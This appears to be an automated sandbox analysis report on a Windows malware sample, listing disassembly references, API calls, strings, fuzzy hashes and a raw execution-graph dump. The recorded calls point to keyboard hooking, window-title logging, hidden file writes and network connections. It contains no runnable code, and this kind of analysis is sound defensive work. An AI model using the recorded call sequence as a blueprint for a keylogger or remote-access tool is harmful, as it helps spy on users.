                                              • GetParent.USER32(?), ref: 0041A4CE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Window$LongMessageParentSend
                                              • String ID:
                                              • API String ID: 2571540958-0
                                              • Opcode ID: f87e2db7d642b718cdb5e782880d86ae2cc92590bc91bf3e2829ce3af81419a0
                                              • Instruction ID: d14a4c9261c9bfe6ea89002c6d86b05037672ab9812461308a4e6696fe1dd4f1
                                              • Opcode Fuzzy Hash: f87e2db7d642b718cdb5e782880d86ae2cc92590bc91bf3e2829ce3af81419a0
                                              • Instruction Fuzzy Hash: FA01F9366436217BC72296255C14EBB3659EFC62A0F054526F9089B321FB78CC1242AE
                                              APIs
                                              • 73A0A570.USER32(00000000,?,?,?,00411042,?,?,?,?,?,?,?,?,00424576,00000000,?), ref: 0043C055
                                              • 73A14620.GDI32(00000000,00000008,?,?,00411042,?,?,?,?,?,?,?,?,00424576,00000000,?), ref: 0043C06E
                                              • 73A14620.GDI32(00000000,0000000A,?,?,00411042,?,?,?,?,?,?,?,?,00424576,00000000,?), ref: 0043C07D
                                              • 73A0A480.USER32(00000000,00000000,?,?,00411042,?,?,?,?,?,?,?,?,00424576,00000000,?), ref: 0043C084
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: A14620$A480A570
                                              • String ID:
                                              • API String ID: 787695464-0
                                              • Opcode ID: bde29647645f6f62431ba4956432fcdcdd02fa35a371fb05dad9c327f0370f79
                                              • Instruction ID: 647cde6ad6d127a058f9c9188c9070063168958bc0e1fe4f50d07073395ba153
                                              • Opcode Fuzzy Hash: bde29647645f6f62431ba4956432fcdcdd02fa35a371fb05dad9c327f0370f79
                                              • Instruction Fuzzy Hash: E1E09235381351ABD3208F759CC5B4BBBA8EFC9B62F114025F508A7290C73098018B79
                                              APIs
                                              • 73A0A570.USER32(00000000,00000000,?,00000000,00438343,00438F8E,00000000,?), ref: 0043C015
                                              • 73A14620.GDI32(00000000,0000000E), ref: 0043C026
                                              • 73A14620.GDI32(00000000,0000000C), ref: 0043C02D
                                              • 73A0A480.USER32(00000000,00000000), ref: 0043C035
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: A14620$A480A570
                                              • String ID:
                                              • API String ID: 787695464-0
                                              • Opcode ID: ade5a79a339f2738448f29a114826966c7061f7a60283a8ffba4494c2e38d894
                                              • Instruction ID: 466c391f0f8cbe89267b517a2457401cac0d02a45389bc6ea158d6bce9fdb278
                                              • Opcode Fuzzy Hash: ade5a79a339f2738448f29a114826966c7061f7a60283a8ffba4494c2e38d894
                                              • Instruction Fuzzy Hash: 65D0123A7812647BF21017755C8AF575A5DCFC96E2F000132FA05DA2E185704C018678
                                              APIs
                                              Strings
                                              • Are you sure you want to un-install the PunkBuster Service?, xrefs: 004098DC
                                              • Un-Install PunkBuster Service, xrefs: 004098CF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: Are you sure you want to un-install the PunkBuster Service?$Un-Install PunkBuster Service
                                              • API String ID: 3519838083-2198055661
                                              • Opcode ID: e3005dc6f923ab64d1770305e9fc94f3ff6c3953480be8e329947beef0f464ac
                                              • Instruction ID: 3f86f169e8ea4f34bfe8433b3b75cf2069d93a569d5023850833cb461211cf54
                                              • Opcode Fuzzy Hash: e3005dc6f923ab64d1770305e9fc94f3ff6c3953480be8e329947beef0f464ac
                                              • Instruction Fuzzy Hash: 0831BF71C002899ECB00DF69C888BEDBBB4AB16314F5481BED455773E2C7385A08CB55
                                              APIs
                                              • GetStockObject.GDI32 ref: 0043B068
                                              • GetObjectA.GDI32(00000000,0000003C,?), ref: 0043B07E
                                                • Part of subcall function 00498F70: GetVersionExA.KERNEL32 ref: 00498F97
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Object$StockVersion
                                              • String ID: MS Shell Dlg 2
                                              • API String ID: 3343268070-3198668166
                                              • Opcode ID: cec77b159c0ea83f857012d5b4ae8469a07a81413d6283470a563a47e63a9e61
                                              • Instruction ID: e155e28d74422bf90b24fc72c595fcbdcfc2968bb2b625db651e1d297fa305ef
                                              • Opcode Fuzzy Hash: cec77b159c0ea83f857012d5b4ae8469a07a81413d6283470a563a47e63a9e61
                                              • Instruction Fuzzy Hash: 5A318E745083819FD724CF25C884B5BBBF0FBC8704F00892EE9A587392E7789548CB9A
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: Message$get_FirewallEnabled failed: 0x%08lx
                                              • API String ID: 3519838083-3669246561
                                              • Opcode ID: f2581173cd54d603dfba8b1a4541f22ab2f090637743848d00e32e1f658e4987
                                              • Instruction ID: f105753d09791b4c671eee8698da4191506a5d5f18efc9bd2aac6efeec02826c
                                              • Opcode Fuzzy Hash: f2581173cd54d603dfba8b1a4541f22ab2f090637743848d00e32e1f658e4987
                                              • Instruction Fuzzy Hash: B911E671600108FFCB00EFA9C881ADE77A5AF48314F10827EF55AE71D1D7749A44C754
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: Do you really want to cancel?$Question
                                              • API String ID: 3519838083-3547955172
                                              • Opcode ID: 6fc31e5780a0badf5ea5a55fa3ab369bd68f04cf11b64c784a4b1dd1a9fc8802
                                              • Instruction ID: bd53129a67d079509a4369cd051eac07b3f348f5042458483638bc8e6ad9a035
                                              • Opcode Fuzzy Hash: 6fc31e5780a0badf5ea5a55fa3ab369bd68f04cf11b64c784a4b1dd1a9fc8802
                                              • Instruction Fuzzy Hash: 3401B531C00199ABCB10E795C942FEEBB749F11324F60425BE461721D2D7781B48C695
                                              APIs
                                              Strings
                                              • 2.8 (no debug,ANSI,Visual C++,wx containers,compatible with 2.6), xrefs: 00407D94
                                              • your program, xrefs: 00407D8F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: 2.8 (no debug,ANSI,Visual C++,wx containers,compatible with 2.6)$your program
                                              • API String ID: 3519838083-1349685460
                                              • Opcode ID: 61e011678f064aa3f66947369e1c99ca4cbf35dee3a15426a5a2a6d62de62783
                                              • Instruction ID: 1523a34304f5ca219838624e3a2edcca56625a63025bcd44c9342f38124bf159
                                              • Opcode Fuzzy Hash: 61e011678f064aa3f66947369e1c99ca4cbf35dee3a15426a5a2a6d62de62783
                                              • Instruction Fuzzy Hash: C6E09270E505699ACB10AFA54C427DE7AA09B04748F10453FE051E72C1DBBC594087ED

                                              Execution Graph

                                              Execution Coverage:3.4%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:5.6%
                                              Total number of Nodes:1472
                                              Total number of Limit Nodes:52
                                              execution_graph: interactive call-graph of the analysed process (1472 nodes, 52 limit nodes; nodes are function addresses annotated with API call counts such as RegOpenKeyExA, CreateProcessA, CreateMutexA, CreateThread, WSAStartup, connect, GetComputerNameExW, SetProcessDEPPolicy, DeleteFileW); the raw node/edge list is not reproduced here.
59077 d2541 RegQueryValueExA RegCloseKey 59076->59077 59078 d2569 59076->59078 59077->59078 59079 c1f66 28 API calls 59078->59079 59080 d257e 59079->59080 59080->58700 59081->58709 59083 cb02f 59082->59083 59086 cb04b 59083->59086 59085 cb045 59085->58719 59087 cb055 59086->59087 59089 cb060 59087->59089 59090 cb138 28 API calls 59087->59090 59089->59085 59090->59089 59091->58723 59092->58725 59094 c230d 59093->59094 59095 c2325 28 API calls 59094->59095 59096 c1f80 59095->59096 59096->58452 59115 fa545 59097->59115 59099 f998b 59124 f92de 38 API calls 3 library calls 59099->59124 59100 f9965 59122 105354 20 API calls _free 59100->59122 59101 f9950 59101->59099 59101->59100 59114 cdd54 59101->59114 59104 f996a 59123 fa827 26 API calls _Deallocate 59104->59123 59107 f9997 59108 f99c6 59107->59108 59125 fa58a 42 API calls __Tolower 59107->59125 59111 f9a32 59108->59111 59126 fa4f1 26 API calls 2 library calls 59108->59126 59127 fa4f1 26 API calls 2 library calls 59111->59127 59112 f9af9 _strftime 59112->59114 59128 105354 20 API calls _free 59112->59128 59114->58467 59114->58469 59116 fa55d 59115->59116 59117 fa54a 59115->59117 59116->59101 59129 105354 20 API calls _free 59117->59129 59119 fa54f 59130 fa827 26 API calls _Deallocate 59119->59130 59121 fa55a 59121->59101 59122->59104 59123->59114 59124->59107 59125->59107 59126->59111 59127->59112 59128->59114 59129->59119 59130->59121 59135 c1e9b 59131->59135 59133 c27d9 59133->58764 59134->58768 59136 c1ea7 59135->59136 59137 c245c 28 API calls 59136->59137 59138 c1eb9 59137->59138 59138->59133 59140 c9855 59139->59140 59141 d24b7 3 API calls 59140->59141 59142 c985c 59141->59142 59143 c988a 59142->59143 59144 c9870 59142->59144 59158 c82dc 59143->59158 59145 c9875 59144->59145 59146 c95cf 59144->59146 59148 c82dc 28 API calls 59145->59148 59146->58504 59150 c9883 59148->59150 59184 c9959 29 API calls 59150->59184 59153 c9888 59153->59146 59154->58794 59325 c2d8b 59155->59325 59157 c28dd 59157->58797 59159 c82eb 
59158->59159 59185 c8431 59159->59185 59161 c8309 59162 c98a5 59161->59162 59190 caffa 59162->59190 59165 c98ce 59167 c1f66 28 API calls 59165->59167 59166 c98f6 59168 c1f66 28 API calls 59166->59168 59169 c98d8 59167->59169 59170 c9901 59168->59170 59171 dae08 28 API calls 59169->59171 59172 c1f66 28 API calls 59170->59172 59173 c98e6 59171->59173 59174 c9910 59172->59174 59194 ca876 31 API calls ___crtLCMapStringA 59173->59194 59176 da686 79 API calls 59174->59176 59178 c9915 CreateThread 59176->59178 59177 c98ed 59179 c1eea 26 API calls 59177->59179 59180 c993c CreateThread 59178->59180 59181 c9930 CreateThread 59178->59181 59206 c99a9 59178->59206 59179->59166 59182 c1e13 26 API calls 59180->59182 59203 c99b5 59180->59203 59181->59180 59200 c9993 59181->59200 59183 c9950 59182->59183 59183->59146 59184->59153 59324 c999f 135 API calls 59184->59324 59186 c843d 59185->59186 59188 c845b 59186->59188 59189 c2f0d 28 API calls 59186->59189 59188->59161 59189->59188 59192 cb006 59190->59192 59191 c98c3 59191->59165 59191->59166 59192->59191 59195 c3b9e 59192->59195 59194->59177 59196 c3ba8 59195->59196 59198 c3bb3 59196->59198 59199 c3cfd 28 API calls 59196->59199 59198->59191 59199->59198 59209 c99e4 59200->59209 59242 ca3f4 59203->59242 59279 c9e48 59206->59279 59210 c99ff GetModuleHandleA SetWindowsHookExA 59209->59210 59211 c9a63 KiUserCallbackDispatcher 59209->59211 59210->59211 59212 c9a1b GetLastError 59210->59212 59213 c999c 59211->59213 59214 c9a75 TranslateMessage DispatchMessageA 59211->59214 59224 dad46 59212->59224 59214->59211 59214->59213 59218 c9a3e 59219 c1f66 28 API calls 59218->59219 59220 c9a4d 59219->59220 59221 da686 79 API calls 59220->59221 59222 c9a52 59221->59222 59223 c1eea 26 API calls 59222->59223 59223->59213 59230 100c51 59224->59230 59227 c1f66 28 API calls 59228 c9a31 59227->59228 59229 c4c9e 28 API calls 59228->59229 59229->59218 59231 100c5d 59230->59231 59234 100a4d 59231->59234 59235 100a64 59234->59235 59238 dad67 59235->59238 
59240 105354 20 API calls _free 59235->59240 59237 100a9b 59241 fa827 26 API calls _Deallocate 59237->59241 59238->59227 59240->59237 59241->59238 59270 ca402 59242->59270 59243 c99be 59244 ca45c Sleep GetForegroundWindow GetWindowTextLengthW 59245 cb027 28 API calls 59244->59245 59245->59270 59249 daca0 GetTickCount 59249->59270 59250 ca4a2 GetWindowTextW 59250->59270 59252 c1e13 26 API calls 59252->59270 59253 caffa 28 API calls 59253->59270 59254 ca5ff 59255 c1e13 26 API calls 59254->59255 59255->59243 59256 ca569 Sleep 59256->59270 59257 100c51 26 API calls 59257->59270 59259 c1f66 28 API calls 59259->59270 59260 ca4f1 59262 c82dc 28 API calls 59260->59262 59260->59270 59275 ca876 31 API calls ___crtLCMapStringA 59260->59275 59262->59260 59264 c5ce6 28 API calls 59264->59270 59266 c28cf 28 API calls 59266->59270 59267 c9d58 27 API calls 59267->59270 59268 dae08 28 API calls 59268->59270 59269 c1eea 26 API calls 59269->59270 59270->59243 59270->59244 59270->59249 59270->59250 59270->59252 59270->59253 59270->59254 59270->59256 59270->59257 59270->59259 59270->59260 59270->59264 59270->59266 59270->59267 59270->59268 59270->59269 59271 f3519 5 API calls __Init_thread_wait 59270->59271 59272 f38a5 29 API calls __onexit 59270->59272 59273 f34cf EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 59270->59273 59274 c82a8 28 API calls 59270->59274 59276 cb0dd 28 API calls 59270->59276 59277 cae58 44 API calls 2 library calls 59270->59277 59278 c4c9e 28 API calls 59270->59278 59271->59270 59272->59270 59273->59270 59274->59270 59275->59260 59276->59270 59277->59270 59278->59270 59280 c9e5d Sleep 59279->59280 59299 c9d97 59280->59299 59282 c99b2 59283 c9eae GetFileAttributesW 59289 c9e6f 59283->59289 59284 c9e9d CreateDirectoryW 59284->59289 59285 c9ec5 SetFileAttributesW 59285->59289 59287 c9f10 59288 c9f3f PathFileExistsW 59287->59288 59292 c1f86 28 API calls 59287->59292 59293 ca048 SetFileAttributesW 59287->59293 59294 c1eea 26 API calls 59287->59294 
59295 c6052 28 API calls 59287->59295 59296 c1eef 26 API calls 59287->59296 59298 c1eea 26 API calls 59287->59298 59321 db61a 32 API calls 59287->59321 59322 db687 CreateFileW SetFilePointer WriteFile CloseHandle 59287->59322 59288->59287 59289->59280 59289->59282 59289->59283 59289->59284 59289->59285 59289->59287 59290 c1d64 28 API calls 59289->59290 59312 db58f 59289->59312 59290->59289 59292->59287 59293->59289 59294->59287 59295->59287 59296->59287 59298->59289 59300 c9e44 59299->59300 59302 c9dad 59299->59302 59300->59289 59301 c9dcc CreateFileW 59301->59302 59303 c9dda GetFileSize 59301->59303 59302->59301 59304 c9e0f CloseHandle 59302->59304 59305 c9e21 59302->59305 59306 c9dfd 59302->59306 59307 c9e04 Sleep 59302->59307 59303->59302 59303->59304 59304->59302 59305->59300 59309 c82dc 28 API calls 59305->59309 59323 ca7f0 83 API calls 59306->59323 59307->59304 59310 c9e3d 59309->59310 59311 c98a5 126 API calls 59310->59311 59311->59300 59313 db5a2 CreateFileW 59312->59313 59315 db5df 59313->59315 59316 db5db 59313->59316 59317 db5f6 WriteFile 59315->59317 59318 db5e6 SetFilePointer 59315->59318 59316->59289 59319 db60b CloseHandle 59317->59319 59320 db609 59317->59320 59318->59317 59318->59319 59319->59316 59320->59319 59321->59287 59322->59287 59323->59307 59326 c2d97 59325->59326 59329 c30f7 59326->59329 59328 c2dab 59328->59157 59330 c3101 59329->59330 59332 c3115 59330->59332 59333 c36c2 28 API calls 59330->59333 59332->59328 59333->59332 59335 c3b48 59334->59335 59341 c3b7a 59335->59341 59338 c3cbb 59345 c3dc2 59338->59345 59340 c3cc9 59340->58805 59342 c3b86 59341->59342 59343 c3b9e 28 API calls 59342->59343 59344 c3b5a 59343->59344 59344->59338 59346 c3dce 59345->59346 59349 c2ffd 59346->59349 59348 c3de3 59348->59340 59350 c300e 59349->59350 59351 c32a4 28 API calls 59350->59351 59352 c301a 59351->59352 59354 c302e 59352->59354 59355 c35e8 28 API calls 59352->59355 59354->59348 59355->59354 59362 f95ba 59356->59362 59360 d27ed RegSetValueExA 
RegCloseKey 59359->59360 59361 d2814 59359->59361 59360->59361 59361->58830 59365 f953b 59362->59365 59364 c1608 59364->58828 59366 f955e 59365->59366 59367 f954a 59365->59367 59372 f955a __alldvrm 59366->59372 59375 107601 11 API calls 2 library calls 59366->59375 59373 105354 20 API calls _free 59367->59373 59369 f954f 59374 fa827 26 API calls _Deallocate 59369->59374 59372->59364 59373->59369 59374->59372 59375->59372 59377 daab9 _Yarn ___scrt_fastfail 59376->59377 59378 c1f66 28 API calls 59377->59378 59379 dab2e 59378->59379 59379->58834 59380->58850 59382 d3fa9 59381->59382 59383 d3fb3 getaddrinfo WSASetLastError 59381->59383 59532 d3e37 35 API calls ___std_exception_copy 59382->59532 59383->58914 59385 d3fae 59385->59383 59387 c41fd 59386->59387 59388 c4206 socket 59386->59388 59533 c4262 WSAStartup 59387->59533 59390 c4224 CreateEventW 59388->59390 59391 c4220 59388->59391 59390->58914 59391->58914 59392 c4202 59392->59388 59392->59391 59394 c49b1 59393->59394 59395 c492a 59393->59395 59394->58914 59396 c4933 59395->59396 59397 c4987 CreateEventA CreateThread 59395->59397 59398 c4942 GetLocalTime 59395->59398 59396->59397 59397->59394 59535 c4b1d 59397->59535 59399 dad46 28 API calls 59398->59399 59400 c495b 59399->59400 59534 c4c9e 28 API calls 59400->59534 59402 c4968 59403 c1f66 28 API calls 59402->59403 59404 c4977 59403->59404 59405 da686 79 API calls 59404->59405 59406 c497c 59405->59406 59407 c1eea 26 API calls 59406->59407 59407->59397 59409 c43e1 59408->59409 59410 c42b3 59408->59410 59411 c4343 59409->59411 59412 c43e7 WSAGetLastError 59409->59412 59410->59411 59413 c42e8 59410->59413 59416 c4cbf 28 API calls 59410->59416 59411->58914 59412->59411 59414 c43f7 59412->59414 59539 e0151 27 API calls 59413->59539 59417 c43fc 59414->59417 59418 c42f7 59414->59418 59420 c42d4 59416->59420 59544 dbc76 30 API calls 59417->59544 59423 c1f66 28 API calls 59418->59423 59419 c42f0 59419->59418 59422 c4306 59419->59422 59424 c1f66 28 API calls 59420->59424 
59433 c434c 59422->59433 59434 c4315 59422->59434 59426 c4448 59423->59426 59427 c42e3 59424->59427 59425 c440b 59545 c4c9e 28 API calls 59425->59545 59430 c1f66 28 API calls 59426->59430 59431 da686 79 API calls 59427->59431 59429 c4418 59432 c1f66 28 API calls 59429->59432 59435 c4457 59430->59435 59431->59413 59436 c4427 59432->59436 59541 e0f34 56 API calls 59433->59541 59438 c1f66 28 API calls 59434->59438 59439 da686 79 API calls 59435->59439 59440 da686 79 API calls 59436->59440 59442 c4324 59438->59442 59439->59411 59443 c442c 59440->59443 59441 c4354 59444 c4389 59441->59444 59445 c4359 59441->59445 59446 c1f66 28 API calls 59442->59446 59447 c1eea 26 API calls 59443->59447 59543 e02ea 28 API calls 59444->59543 59448 c1f66 28 API calls 59445->59448 59449 c4333 59446->59449 59447->59411 59451 c4368 59448->59451 59452 da686 79 API calls 59449->59452 59455 c1f66 28 API calls 59451->59455 59456 c4338 59452->59456 59453 c4391 59454 c43be CreateEventW CreateEventW 59453->59454 59457 c1f66 28 API calls 59453->59457 59454->59411 59458 c4377 59455->59458 59540 ddc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 59456->59540 59459 c43a7 59457->59459 59460 da686 79 API calls 59458->59460 59462 c1f66 28 API calls 59459->59462 59463 c437c 59460->59463 59464 c43b6 59462->59464 59542 e0592 54 API calls 59463->59542 59466 da686 79 API calls 59464->59466 59467 c43bb 59466->59467 59467->59454 59546 da945 GlobalMemoryStatusEx 59468->59546 59470 da982 59470->58914 59547 d3646 59471->59547 59475 ccc0d 59474->59475 59476 d246e 3 API calls 59475->59476 59478 ccc14 59476->59478 59477 ccc2c 59477->58914 59478->59477 59479 d24b7 3 API calls 59478->59479 59479->59477 59481 c1f86 28 API calls 59480->59481 59482 dae03 59481->59482 59482->58914 59484 dacb6 GetTickCount 59483->59484 59484->58914 59486 f6050 ___scrt_fastfail 59485->59486 59487 dac71 GetForegroundWindow GetWindowTextW 59486->59487 59488 c3b40 28 API calls 59487->59488 59489 dac9b 59488->59489 
59489->58914 59491 c1f66 28 API calls 59490->59491 59492 ce69e 59491->59492 59492->58914 59494 c27f8 59493->59494 59495 c2e78 28 API calls 59494->59495 59496 c2814 59495->59496 59496->58914 59498 c447b 59497->59498 59588 c4be8 59498->59588 59500 c4490 _Yarn 59501 c4507 WaitForSingleObject 59500->59501 59502 c44e7 59500->59502 59504 c451d 59501->59504 59503 c44f9 send 59502->59503 59505 c4542 59503->59505 59592 e051a 56 API calls 59504->59592 59508 c1eea 26 API calls 59505->59508 59507 c4530 SetEvent 59507->59505 59509 c454a 59508->59509 59510 c1eea 26 API calls 59509->59510 59511 c4552 59510->59511 59511->58914 59518 c45ec 59512->59518 59513 fa88c ___crtLCMapStringA 21 API calls 59513->59518 59515 c1f86 28 API calls 59515->59518 59516 c4666 59615 c47eb 98 API calls 59516->59615 59517 c1eef 26 API calls 59517->59518 59518->59513 59518->59515 59518->59516 59518->59517 59520 c1eea 26 API calls 59518->59520 59598 c455b 59518->59598 59604 c4688 59518->59604 59520->59518 59521 c466d 59522 c1eea 26 API calls 59521->59522 59523 c4676 59522->59523 59524 c1eea 26 API calls 59523->59524 59525 c467f 59524->59525 59525->58914 59527->58914 59528->58880 59529->58880 59530->58880 59531->58880 59532->59385 59533->59392 59534->59402 59538 c4b29 101 API calls 59535->59538 59537 c4b26 59538->59537 59539->59419 59540->59411 59541->59441 59542->59456 59543->59453 59544->59425 59545->59429 59546->59470 59550 d3619 59547->59550 59551 d362e ___scrt_initialize_default_local_stdio_options 59550->59551 59554 fe2dd 59551->59554 59557 fb030 59554->59557 59558 fb058 59557->59558 59559 fb070 59557->59559 59581 105354 20 API calls _free 59558->59581 59559->59558 59561 fb078 59559->59561 59583 f92de 38 API calls 3 library calls 59561->59583 59562 fb05d 59582 fa827 26 API calls _Deallocate 59562->59582 59565 fb088 59584 fb7b6 20 API calls 2 library calls 59565->59584 59568 d363c 59568->58914 59569 fb100 59585 fbe24 50 API calls 3 library calls 59569->59585 59572 fb068 59574 f3d2c 59572->59574 59573 
fb10b 59586 fb820 20 API calls _free 59573->59586 59575 f3d37 IsProcessorFeaturePresent 59574->59575 59576 f3d35 59574->59576 59578 f41a4 59575->59578 59576->59568 59587 f4168 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 59578->59587 59580 f4287 59580->59568 59581->59562 59582->59572 59583->59565 59584->59569 59585->59573 59586->59572 59587->59580 59589 c4bf0 59588->59589 59593 c4c0c 59589->59593 59591 c4c06 59591->59500 59592->59507 59594 c4c16 59593->59594 59596 c4c21 59594->59596 59597 c4d07 28 API calls 59594->59597 59596->59591 59597->59596 59599 c4565 WaitForSingleObject 59598->59599 59600 c4592 recv 59598->59600 59616 e0556 56 API calls 59599->59616 59602 c45a5 59600->59602 59602->59518 59603 c4581 SetEvent 59603->59602 59614 c46a3 59604->59614 59605 c47d8 59606 c1eea 26 API calls 59605->59606 59607 c47e1 59606->59607 59607->59518 59608 c1eef 26 API calls 59608->59614 59609 c1eea 26 API calls 59609->59614 59610 c1fbd 28 API calls 59610->59614 59611 c1ebd 28 API calls 59612 c4772 CreateEventA CreateThread WaitForSingleObject CloseHandle 59611->59612 59612->59614 59617 d4b9b 59612->59617 